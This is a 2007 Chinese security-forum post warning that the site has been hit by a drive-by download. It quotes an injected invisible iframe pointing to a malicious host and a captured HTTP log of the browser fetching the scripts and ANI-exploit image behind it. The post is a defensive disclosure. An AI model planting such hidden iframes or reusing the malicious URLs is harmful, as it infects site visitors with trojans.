现在是11:30 2007-6-20，没事来看雪看看，一上，杀毒软件报警。
時間        模件        物件        名稱        病毒        動作        使用者名稱        資訊
2007-6-20 11:27:09        IMON        檔案        http://www.if56.cn/ad.jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan                hklzt       

查看源代码，发现：
<iframe src=http://1111.845845.cn/xi.htm  width=0 height=0></iframe>
被挂马了！
里面使用了ad.jpg此图片，该图片是以前的ANI漏洞。
各位注意了！
请管理员迅速做好处理工作！！对此人表示BS！
下面是一些信息。

+++GET 2364+++
GET /xi.htm HTTP/1.0
Accept: */*
Accept-Language: zh-cn
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 1111.845845.cn
Connection: keep-alive

+++RESP 2364+++
HTTP/1.1 200 OK
Content-Length: 494
Content-Type: text/html
+++关闭 2364+++

+++GET 2365+++
GET /0002.js HTTP/1.0
Accept: */*
Referer: http://1111.845845.cn/xi.htm
Accept-Language: zh-cn
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 1234.89111.cn
Connection: keep-alive

+++GET 2366+++
GET /ad.jpg HTTP/1.0
Accept: */*
Referer: http://1111.845845.cn/xi.htm
Accept-Language: zh-cn
UA-CPU: x86
Range: bytes=2470-
Unless-Modified-Since: Sat, 16 Jun 2007 18:35:28 GMT
If-Range: "x"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.if56.cn
Connection: keep-alive

+++GET 2367+++
GET /favicon.ico HTTP/1.0
Accept: */*
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 1111.845845.cn
Connection: keep-alive

+++RESP 2366+++
HTTP/1.1 200 OK
Content-Length: 3759
Content-Type: image/jpeg
Last-Modified: Sat, 16 Jun 2007 18:35:28 GMT
Accept-Ranges: bytes
ETag: "0d8741c45b0c71:361"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 20 Jun 2007 03:27:10 GMT

+++RESP 2367+++
HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 20 Jun 2007 03:27:10 GMT
+++关闭 2367+++
+++关闭 2365+++

+++GET 2368+++
GET /t1.aspx?id=37219617 HTTP/1.0
Accept: */*
Referer: http://1111.845845.cn/xi.htm
Accept-Language: zh-cn
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: ww3.tongji123.com
Connection: keep-alive

+++GET 2369+++
GET /lo/2.htm HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://1111.845845.cn/xi.htm
Accept-Language: zh-cn
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.if56.cn
Connection: keep-alive

+++RESP 2369+++
HTTP/1.1 200 OK
Content-Length: 410
Content-Type: text/html
+++关闭 2369+++

+++GET 2370+++
GET /lo/haha.js HTTP/1.0
Accept: */*
Referer: http://www.if56.cn/lo/2.htm
Accept-Language: zh-cn
UA-CPU: x86
If-Modified-Since: Sun, 10 Jun 2007 05:44:16 GMT
If-None-Match: "e66016222abc71:382"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.if56.cn
Connection: keep-alive

+++RESP 2370+++
HTTP/1.1 304 Not Modified
Date: Wed, 20 Jun 2007 03:27:12 GMT

Etag: "e66016222abc71:382"
+++关闭 2370+++

+++GET 2371+++
GET /favicon.ico HTTP/1.0
Accept: */*
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 1111.845845.cn
Connection: keep-alive

+++RESP 2371+++
HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 20 Jun 2007 03:27:12 GMT
+++关闭 2371+++

+++RESP 2368+++
HTTP/1.1 200 OK
Content-Type: text/html; charset=gb2312
Content-Length: 683
+++关闭 2368+++

[培训]二进制漏洞攻防（第3期）；满10人开班；模糊测试与工具使用二次开发；网络协议漏洞挖掘；Linux内核漏洞挖掘与利用；AOSP漏洞挖掘与利用；代码审计。